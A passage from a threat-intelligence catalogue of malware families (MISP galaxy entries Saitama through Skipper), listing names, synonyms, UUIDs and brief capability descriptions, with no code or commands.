"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Saitama Backdoor.

Known Synonyms
`AMATIAS`
`Saitama`

Internal MISP references

UUID 435e482d-adfe-4b28-936e-d13fda800767 which can be used as unique global reference for Saitama Backdoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sakula RAT

Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sakula RAT.

Known Synonyms
`Sakurel`

Internal MISP references

UUID e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b which can be used as unique global reference for Sakula RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Salgorea

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Salgorea.

Known Synonyms
`BadCake`

Internal MISP references

UUID 060ff141-bb68-47ca-8a9d-8722f1edaa6e which can be used as unique global reference for Salgorea in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sality

F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.

Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.

Infection Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.

Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.

Payload Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.

Internal MISP references

UUID cf752563-ad8a-4286-b2b3-9acf24a0a09a which can be used as unique global reference for Sality in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SamoRAT

According to PCrisk, SamoRAT is a Remote Access Trojan (RAT), a type of malware that allows the cyber criminals responsible to monitor and control the infected computer. In most cases, RATs are used to steal sensitive information and/or install other malware onto the infected computer.

Internal MISP references

UUID e2db8349-7535-4748-96ac-a18985cf66b8 which can be used as unique global reference for SamoRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SamSam

According to PCrisk, Samsam is high-risk ransomware designed to infect unpatched servers and encrypt files stored on computers networked to the infected server.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SamSam.

Known Synonyms
`Samas`

Internal MISP references

UUID 696d78cb-1716-4ca0-b678-c03c7cfec19a which can be used as unique global reference for SamSam in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sanny

Internal MISP references

UUID 34c6504b-e947-49d8-a963-62b7594b7ef9 which can be used as unique global reference for Sanny in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SapphireMiner

Internal MISP references

UUID 32e9c2ce-08a6-47ee-8636-ea83711930b1 which can be used as unique global reference for SapphireMiner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SapphireStealer

Internal MISP references

UUID e1b2b792-033a-438d-a9c4-4d2adf1abb43 which can be used as unique global reference for SapphireStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SappyCache

Internal MISP references

UUID 056eca1f-4195-48c3-81d8-ed554dd1de20 which can be used as unique global reference for SappyCache in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sarhust

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sarhust.

Known Synonyms
`ENDCMD`
`Hussarini`

Internal MISP references

UUID 5aed5403-9c52-4de6-9c8d-d29e5197ef7e which can be used as unique global reference for Sarhust in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sasfis

Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sasfis.

Known Synonyms
`Oficla`

Internal MISP references

UUID 4c4ceb45-b326-45aa-8f1a-1229e90c78b4 which can be used as unique global reference for Sasfis in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Satacom

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Satacom.

Known Synonyms
`LegionLoader`

Internal MISP references

UUID b08af3b5-2453-4d4b-972a-32e6602410f2 which can be used as unique global reference for Satacom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Satan

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Satan.

Known Synonyms
`5ss5c`
`DBGer`
`Lucky Ransomware`

Internal MISP references

UUID 5639f7db-ab70-4b86-8a2f-9c4e3927ba91 which can be used as unique global reference for Satan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Satana

According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer’s master boot record (MBR) and prevents it from starting.

Internal MISP references

UUID 09b555be-8bac-44b2-8741-922ee0b87880 which can be used as unique global reference for Satana in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Satellite Turla

Internal MISP references

UUID 957f6c4a-c750-4ba3-820f-5a19d444a57a which can be used as unique global reference for Satellite Turla in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sathurbot

Internal MISP references

UUID bdc7cc9c-c46d-4f77-b903-2335cc1a3369 which can be used as unique global reference for Sathurbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ScanLine

According to CISA, this is a command-line port scanning utility from Foundstone. It is used to scan for open UDP and TCP ports, grab banners from open ports, resolve IP addresses to host names, and bind to specified ports and IP addresses.

Internal MISP references

UUID 56d01dfe-6f23-4f76-9fa3-e30e514b8f7f which can be used as unique global reference for ScanLine in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Scano

Internal MISP references

UUID cf619d43-0c69-4644-bcd9-e76ceb7c0d88 which can be used as unique global reference for Scano in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ScanPOS

Internal MISP references

UUID e3adbb0d-6d6e-4686-8108-ee76452339bf which can be used as unique global reference for ScanPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Scarabey

Ransomware with ransomnote in Russian and encryption extension .scarab.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Scarabey.

Known Synonyms
`MVP`
`Scarab`
`Scarab-Russian`

Internal MISP references

UUID 76d20f49-9367-4d36-95d2-7ef8ff55568d which can be used as unique global reference for Scarabey in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Scarab Ransomware

Internal MISP references

UUID c1ccba65-e2f0-4f29-8e04-6b119c7f8694 which can be used as unique global reference for Scarab Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ScareCrow

Based on the leaked Conti source code.

Internal MISP references

UUID 7e8e41de-b3f8-4c2b-a9fe-e1aa6532e76b which can be used as unique global reference for ScareCrow in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Schneiken

Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.

Internal MISP references

UUID 92a65c89-acc3-4ee7-8db0-f0ea293ed12d which can be used as unique global reference for Schneiken in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Scieron

The Chinese threat actor has used a custom backdoor dubbed "Scieron" over years in several campaigns according to SentinelLABS.

Internal MISP references

UUID e343583b-8338-42ea-af60-311578146151 which can be used as unique global reference for Scieron in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Scote

Internal MISP references

UUID 8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e which can be used as unique global reference for Scote in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Scout

A downloader that uses Windows messages to control its execution flow.

Internal MISP references

UUID ca16e8fa-5a86-48be-82ca-40a666b8692b which can be used as unique global reference for Scout in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Scranos

Internal MISP references

UUID b5d90140-f307-402c-9d7f-9cdf21a7cb31 which can be used as unique global reference for Scranos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ScreenCap

SentinelOne describes this malware as capable of doing screen capture and keylogging. It is uses by a threat cluster they named WIP19, targeting telecommunications and IT service providers in the Middle East and Asia.

Internal MISP references

UUID cba2db46-268c-4203-a982-3bf9985c91a4 which can be used as unique global reference for ScreenCap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ScreenLocker

Internal MISP references

UUID 9803b201-28e5-40c5-b661-c1a191388072 which can be used as unique global reference for ScreenLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ScrubCrypt

ScrubCrypt is the rebranded "Jlaive" crypter, with a unique capability of .BAT packing

Internal MISP references

UUID 6f597339-7eac-4885-b888-bf8a81bca7b3 which can be used as unique global reference for ScrubCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SDBbot

Internal MISP references

UUID 48bbf0b7-d8c3-4ddb-8498-cf8e72b210d8 which can be used as unique global reference for SDBbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SEADADDY

Backdoor written in Python 2, deployed with PyInstaller.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SEADADDY.

Known Synonyms
`SeaDuke`
`Seadask`

Internal MISP references

UUID 1d07212e-6292-40a4-a5e9-30aef83b6207 which can be used as unique global reference for SEADADDY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SeaSalt

Internal MISP references

UUID d66f466a-e70e-4b62-9a04-d62eb41da15c which can be used as unique global reference for SeaSalt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SectopRAT

SectopRAT, aka ArechClient2, is a .NET RAT with numerous capabilities including multiple stealth functions. Arechclient2 can profile victim systems, steal information such as browser and crypto-wallet data, and launch a hidden secondary desktop to control browser sessions. Additionally, it has several anti-VM and anti-emulator capabilities.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SectopRAT.

Known Synonyms
`1xxbot`
`ArechClient`

Internal MISP references

UUID a7e3b468-399c-419c-87d5-4efcea8ec0cc which can be used as unique global reference for SectopRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SeDll

Internal MISP references

UUID 272268bb-2715-476b-a121-49142581c559 which can be used as unique global reference for SeDll in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sedreco

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sedreco.

Known Synonyms
`azzy`
`eviltoss`

Internal MISP references

UUID 21ab9e14-602a-4a76-a308-dbf5d6a91d75 which can be used as unique global reference for Sedreco in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Seduploader

simple tool to facilitate download and persistence of a next-stage tool; collects system information and metadata probably in an attempt to tell sandbox-environments apart from real targets on the server-side; uses domains of search engines like Google to check for Internet connectivity; XOR-based string obfuscation with a 16-byte key

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Seduploader.

Known Synonyms
`GAMEFISH`
`carberplike`
`downrage`
`jhuhugit`
`jkeyskw`

Internal MISP references

UUID 6bd20349-1231-4aaa-ba2a-f4b09d3b344c which can be used as unique global reference for Seduploader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

seinup

Internal MISP references

UUID 9789dfe8-d156-4f19-8177-25718dd14f1f which can be used as unique global reference for seinup in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sekhmet

According to PCrisk, Sekhmet is ransomware. This malicious program operates by encrypting data and demanding ransom payments for decryption. During the encryption process, all affected files are appended with an extension, consisting of random characters (e.g. ".HrUSsw", ".WNgh", ".NdWfEr", etc.).

Internal MISP references

UUID b4b4e8c8-fc66-4618-ba35-75f21d7d6922 which can be used as unique global reference for Sekhmet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SelfMake Loader

Internal MISP references

UUID 2ef98145-45b8-4acf-ba28-71f495581387 which can be used as unique global reference for SelfMake Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SendSafe

Internal MISP references

UUID 503ca41c-7788-477c-869b-ac530f20c490 which can be used as unique global reference for SendSafe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SepSys

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SepSys.

Known Synonyms
`Silvertor Ransomware`

Internal MISP references

UUID 08f37434-4aba-439f-afae-fed61f411ac4 which can be used as unique global reference for SepSys in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sepulcher

Internal MISP references

UUID 6025475a-b89d-401d-882d-50fe1b03154f which can be used as unique global reference for Sepulcher in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SerialVlogger

This malware is protected using VMProtect and related to the loading of KEYPLUG.

Internal MISP references

UUID 0592daf4-5f68-4087-ad4e-efe773009ca6 which can be used as unique global reference for SerialVlogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Serpent Stealer

Internal MISP references

UUID 446f7e21-f4d0-4725-b1fb-254b090c3e4f which can be used as unique global reference for Serpent Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Serpico

Internal MISP references

UUID 0d4ca924-7e7e-4385-b14d-f504b4d206e5 which can be used as unique global reference for Serpico in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico - webarchive

Associated metadata

Metadata key	Value
type	[]

ServHelper

ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.

ProofPoint noticed two distinct variant - "tunnel" and "downloader" (citation): "The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader."

Internal MISP references

UUID cebfa7af-8c31-4dda-8373-82893c7f43f4 which can be used as unique global reference for ServHelper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SessionManager

A malicious IIS module that allows up/download of files, remote command execution, and using the compromised server as a hop into the network behind.

Internal MISP references

UUID 2ed6f7dc-32ba-4799-87b6-8867e8182cec which can be used as unique global reference for SessionManager in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sfile

Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sfile.

Known Synonyms
`Escal`
`Morseop`

Internal MISP references

UUID 6899dd08-a94b-4e76-813e-1b8437d23aa4 which can be used as unique global reference for Sfile in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

shadowhammer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular shadowhammer.

Known Synonyms
`DAYJOB`

Internal MISP references

UUID 51728278-a95c-45a5-9ae0-9897d41d0efb which can be used as unique global reference for shadowhammer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ShadowPad

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ShadowPad.

Known Synonyms
`POISONPLUG.SHADOW`
`XShellGhost`

Internal MISP references

UUID e089e945-a523-4d11-a135-396f9b6c1dc7 which can be used as unique global reference for ShadowPad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ShadyHammock

Internal MISP references

UUID 5df8173a-8c36-422e-b3f2-7df6503808a7 which can be used as unique global reference for ShadyHammock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shakti

Internal MISP references

UUID f64683c8-50ab-42c0-8b90-881598906528 which can be used as unique global reference for Shakti in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SHAPESHIFT

Internal MISP references

UUID 15dd8386-f11a-485a-b719-440c0a47dee6 which can be used as unique global reference for SHAPESHIFT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

shareip

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular shareip.

Known Synonyms
`remotecmd`

Internal MISP references

UUID 6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e which can be used as unique global reference for shareip in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shark

Internal MISP references

UUID d00c8f94-d6b5-40b7-b167-fc546c5dec38 which can be used as unique global reference for Shark in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SharpBeacon

.NET reimplementation of Cobalt Strike beacon/stager

Internal MISP references

UUID 12c0e80c-c439-4eaf-9272-f78b16010313 which can be used as unique global reference for SharpBeacon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SHARPKNOT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SHARPKNOT.

Known Synonyms
`Bitrep`

Internal MISP references

UUID d31f1c73-d14b-41e2-bb16-81ee1d886e43 which can be used as unique global reference for SHARPKNOT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SharpMapExec

This tool is made to simplify penetration testing of networks and to create a Swiss-army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.

Internal MISP references

UUID e9940cca-6e3a-45e2-88b7-8fa9ae19c647 which can be used as unique global reference for SharpMapExec in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SharpStage

The SharpStage backdoor is a .NET malware with backdoor capabilities. Its name is a derivative of the main activity class called “Stage_One”. SharpStage can take screenshots, run arbitrary commands and downloads additional payloads. It exfiltrates data from the infected machine to a dropbox account by implementing a dropbox client in its code. SharpStage was seen used by the Molerats group in targeted attacks in the middle east.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SharpStage.

Known Synonyms
`LastConn`

Internal MISP references

UUID 11788d9b-485b-4049-ba5e-1b06d526361e which can be used as unique global reference for SharpStage in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SHARPSTATS

Internal MISP references

UUID 819fd946-ed0e-4cec-ad45-66b88e39b732 which can be used as unique global reference for SHARPSTATS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SHATTEREDGLASS

Kaspersky Labs observed Andariel to drop this ransomware in one case within a series of attacks carried out against targets in South Korea in April 2021.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SHATTEREDGLASS.

Known Synonyms
`Unidentified 081`

Internal MISP references

UUID 2eb8ca65-186b-44ae-bd91-189b3eb5ed54 which can be used as unique global reference for SHATTEREDGLASS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ShellClient RAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ShellClient RAT.

Known Synonyms
`GhostShell`

Internal MISP references

UUID f91adcf2-10ce-4ea3-bfae-ea6e270d56f0 which can be used as unique global reference for ShellClient RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ShellLocker

PCRIsk states that ShellLocker is a ransomware-type virus developed using .NET framework. It was first discovered by Jakub Kroustek and is virtually identical to another ransomware virus called Exotic.

Following infiltration, this virus encrypts stored data (video, audio, etc.) and renames encrypted files using the "[random_characters].L0cked" pattern (e.g., "sample.jpg" might be renamed to "gd&=AA0fgoi.L0cked"). Following successful encryption, ShellLocker opens a pop-up window containing ransom-demand message.

Internal MISP references

UUID af35e295-7087-4f6c-9f70-a431bf223822 which can be used as unique global reference for ShellLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shifu

Shifu was originally discovered by Trusteer security researchers (Ilya Kolmanovich, Denis Laskov) in the middle of 2015. It is a banking trojan mostly focusing on Japanese banks and has rich features for remote data extraction and control.

Internal MISP references

UUID 6e668c0c-7085-4951-87d4-0334b6a5cdb3 which can be used as unique global reference for Shifu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shim RAT

Internal MISP references

UUID 67fc358f-da6a-4f01-be23-44bc97319127 which can be used as unique global reference for Shim RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SHIPSHAPE

SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.

Internal MISP references

UUID 07470989-faac-44fb-b505-1d5568b3c716 which can be used as unique global reference for SHIPSHAPE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shujin

Internal MISP references

UUID 77c20bd9-5403-4f99-bae5-c54f3f38a6b6 which can be used as unique global reference for Shujin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shurk Steal

Internal MISP references

UUID 0a8f367d-b63f-4424-bd63-bb6a69d31b63 which can be used as unique global reference for Shurk Steal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shurl0ckr

Internal MISP references

UUID f544ee0e-26f4-48e7-aaee-056f4d1ced82 which can be used as unique global reference for Shurl0ckr in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Shylock

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Shylock.

Known Synonyms
`Caphaw`

Internal MISP references

UUID 515ee69a-298a-4fcf-bdb0-c5fc6d41872f which can be used as unique global reference for Shylock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SideTwist

Internal MISP references

UUID 3275503c-1f0a-4f6c-b13b-ec4ca2b29786 which can be used as unique global reference for SideTwist in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SideWalk (Windows)

Shellcode-based malware family that according to ESET Research was likely written by the same authors as win.crosswalk.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SideWalk (Windows).

Known Synonyms
`ScrambleCross`

Internal MISP references

UUID 497d1e0f-dd0c-4462-b3e2-fb4a22f8333f which can be used as unique global reference for SideWalk (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SideWinder (Windows)

Internal MISP references

UUID 3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8 which can be used as unique global reference for SideWinder (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SiennaBlue

Ransomware used by threat actor group DEV-0530, attributed by MSTIC to North Korean origin.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SiennaBlue.

Known Synonyms
`H0lyGh0st`
`HolyLocker`

Internal MISP references

UUID 607ba366-85fa-406f-adef-6ea7b437b39c which can be used as unique global reference for SiennaBlue in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SiennaPurple

Ransomware used by threat actor group DEV-0530, attributed by MSTIC to North Korean origin.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SiennaPurple.

Known Synonyms
`H0lyGh0st`
`HolyLocker`

Internal MISP references

UUID 5ae172d0-5742-4c4b-8847-2efaf9dfb121 which can be used as unique global reference for SiennaPurple in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sierra(Alfa,Bravo, ...)

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sierra(Alfa,Bravo, ...).

Known Synonyms
`Destover`

Internal MISP references

UUID da92c927-9b31-48aa-854a-8ed49a29565b which can be used as unique global reference for Sierra(Alfa,Bravo, ...) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SiestaGraph

Internal MISP references

UUID a4f4464a-a8d6-4244-af0a-4a8163ab9f47 which can be used as unique global reference for SiestaGraph in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Siggen6

Internal MISP references

UUID c12b3e30-32bf-4b7e-98f6-6a00e95553f8 which can be used as unique global reference for Siggen6 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6 - webarchive

Associated metadata

Metadata key	Value
type	[]

SigLoader

Internal MISP references

UUID 48bf4991-4743-404a-aac1-72855b30e225 which can be used as unique global reference for SigLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

sihost

Internal MISP references

UUID c1b6e597-17e6-4485-819e-5aa03904bc61 which can be used as unique global reference for sihost in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Silence

According to PCrisk, Truebot, also known as Silence.Downloader, is a malicious program that has botnet and loader/injector capabilities. This malware can add victims' devices to a botnet and cause chain system infections (i.e., download/install additional malicious programs/components).

There is significant variation in Truebot's infection chains and distribution. It is likely that the attackers using this malicious software will continue to make such changes.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silence.

Known Synonyms
`TrueBot`

Internal MISP references

UUID 0df52c23-690b-4703-83f7-5befc38ab376 which can be used as unique global reference for Silence in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SilentGh0st

Internal MISP references

UUID 49a06512-fc83-4fc5-b58d-59e0d4005055 which can be used as unique global reference for SilentGh0st in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SILENTUPLOADER

According to Mandiant, SILENTUPLOADER is an uploader written in MSIL that is dropped by DOSTEALER and is designed to work specifically in tandem with it. It checks for files in a specified folder every 30 seconds and uploads them to a remote server.

Internal MISP references

UUID 3ed237f1-35b9-4e74-a37e-966bf023d136 which can be used as unique global reference for SILENTUPLOADER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Silon

Internal MISP references

UUID b602edb3-81c2-4772-b5f8-73deb85cb40a which can be used as unique global reference for Silon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Siluhdur

Internal MISP references

UUID 774fcb67-1eeb-4bda-9b36-b624b632417a which can be used as unique global reference for Siluhdur in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur - webarchive

Associated metadata

Metadata key	Value
type	[]

Simda

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Simda.

Known Synonyms
`iBank`

Internal MISP references

UUID 467ee29c-317f-481a-a77c-69961eb88c4d which can be used as unique global reference for Simda in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SimpleFileMover

Internal MISP references

UUID b56173a1-84e3-4551-ac4a-9e71e65dc9e5 which can be used as unique global reference for SimpleFileMover in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sinowal

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sinowal.

Known Synonyms
`Anserin`
`Mebroot`
`Quarian`
`Theola`
`Torpig`

Internal MISP references

UUID ad5bcaef-1a86-4cc7-8f2e-32306b995018 which can be used as unique global reference for Sinowal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Sisfader

Internal MISP references

UUID 0fba78fc-47a1-45e1-b5df-71bcabd23b5d which can be used as unique global reference for Sisfader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Skimer

Internal MISP references

UUID 6d5e558a-e640-49c3-87b9-2c102c334b1b which can be used as unique global reference for Skimer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SkinnyBoy

Internal MISP references

UUID fce8d9c9-7d83-4221-b726-5c49ea271109 which can be used as unique global reference for SkinnyBoy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

skip-2.0

A Microsoft SQL Server backdoor

Internal MISP references

UUID 6a59a639-8070-4c5f-86be-8a2a081cf487 which can be used as unique global reference for skip-2.0 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Skipper

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Skipper.

Known Synonyms
`Kotel`

Internal MISP references

